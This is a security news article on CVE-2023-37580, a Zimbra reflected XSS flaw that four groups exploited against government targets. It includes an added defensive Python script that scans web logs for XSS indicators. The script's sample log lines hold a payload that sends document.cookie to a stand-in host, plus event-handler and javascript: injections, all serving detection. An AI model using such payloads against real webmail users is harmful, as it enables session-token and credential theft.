A zero-day flaw in the Zimbra Collaboration email software was exploited by four different groups in real-world attacks to obtain email data, user credentials, and authentication tokens.
“Most of this activity occurred after the initial fix became public on GitHub,” Google Threat Analysis Group (TAG) said in a report shared with The Hacker News.
The flaw, tracked as CVE-2023-37580 (CVSS score: 6.1), is a reflected cross-site scripting (XSS) vulnerability affecting versions prior to 8.8.15 Patch 41. Zimbra addressed it as part of patches released on July 25, 2023.
Successful exploitation of the flaw could allow the execution of malicious scripts in victims’ web browsers simply by tricking them into clicking on a specially crafted URL, effectively launching an XSS request against Zimbra and reflecting the attack back to the user.
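Because the attacks described above begin with a victim opening a crafted URL that the webmail server reflects back into the page, the most direct defensive signal is the request itself in the web server's access log. The following is an added example, not code from the article or from Zimbra: it parses a handful of constructed, common-log-format lines (the `/webmail/...` paths and parameters are hypothetical, not Zimbra's real endpoints) and flags query-string values that carry script tags, inline event handlers, `javascript:` URIs or cookie access, decoding a second time to catch double URL-encoding.

```python
"""Flag reflected-XSS-style payloads in web-access log query strings.

Added illustration for defenders; the log lines, paths and parameter names
below are constructed and do not describe CVE-2023-37580 itself.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in common-log-like format (not real Zimbra logs).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jun/2023:10:12:01 +0000] "GET /webmail/inbox?folder=INBOX HTTP/1.1" 200 5120
10.0.0.9 - - [29/Jun/2023:10:12:07 +0000] "GET /webmail/search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 2048
10.0.0.12 - - [29/Jun/2023:10:13:44 +0000] "GET /webmail/view?id=123&name=%22%20onerror%3Dalert(1)%20 HTTP/1.1" 200 900
10.0.0.13 - - [29/Jun/2023:10:14:00 +0000] "GET /webmail/view?id=124&redirect=javascript%3Avoid(0) HTTP/1.1" 302 0
"""

# ip, ident, user, [timestamp], "METHOD url PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator patterns applied to each decoded query-string value.
INDICATORS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"\bjavascript\s*:", re.I)),
    ("cookie_access", re.compile(r"document\s*\.\s*cookie", re.I)),
]


def decoded_params(url):
    """Yield (name, value) pairs from the URL's query string.

    parse_qsl decodes once; a second unquote() pass surfaces payloads that
    were double-encoded to slip past naive filters.
    """
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield name, unquote(value)


def indicators_for(value):
    """Return the names of all indicator patterns matching a decoded value."""
    return [name for name, pattern in INDICATORS if pattern.search(value)]


def scan_log(text):
    """Parse each log line and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        url = match.group("url")
        for name, value in decoded_params(url):
            hits = indicators_for(value)
            if hits:
                findings.append({
                    "ip": match.group("ip"),
                    "path": urlsplit(url).path,
                    "param": name,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['path']} param={finding['param']} "
              f"indicators={','.join(finding['indicators'])}")
```

The patterns are deliberately broad and will produce false positives on legitimate parameters, so this is a triage filter rather than an alert rule; in practice the path list would be narrowed to the endpoints the vendor advisory names, and matches correlated with the source address and subsequent requests to the remote domains the report mentions.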
Google TAG, whose researcher Clément Lecigne is credited with discovering and reporting the bug, says it discovered multiple campaign waves starting June 29, 2023, at least two weeks before Zimbra issued an advisory.
Three of the four campaigns were observed before the release of the patch, with the fourth campaign detected a month after the fixes were published.
The first campaign allegedly targeted a Greek government organization, sending emails containing exploit URLs to its targets that, when clicked, delivered email-stealing malware previously observed in a cyber espionage operation called EmailThief in February 2022.
The intrusion set, which Volexity codenamed TEMP_HERETIC, also exploited a zero-day flaw in Zimbra to carry out the attacks.
The second threat actor to exploit CVE-2023-37580 was Winter Vivern, which targeted government organizations in Moldova and Tunisia shortly after a patch for the vulnerability was pushed to GitHub on July 5.
It is worth noting that the group has been linked by Proofpoint and ESET to the exploitation of security vulnerabilities in Zimbra Collaboration and Roundcube this year.
TAG said it found a third, unknown group that weaponized the bug before the patch was pushed out on July 25 to phish for credentials belonging to a Vietnamese government organization.
“In this case, the exploited URL points to a script that displays a phishing page for users’ webmail credentials and posts the stolen credentials to a URL hosted by an official government domain that the attackers likely compromised,” TAG said.
Finally, a Pakistani government organization was targeted using the flaw on August 25, which resulted in the exfiltration of Zimbra authentication tokens to a remote domain named “ntcpk(.)org.”
Google also points to a pattern in which threat actors regularly exploit XSS vulnerabilities in mail servers, underscoring the need for such applications to be thoroughly audited.
“The discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, shows the importance of organizations applying fixes to their email servers as soon as possible,” TAG said.
“These campaigns also highlight how attackers monitor open source repositories to exploit vulnerabilities where fixes are in the repository, but not yet released to users.”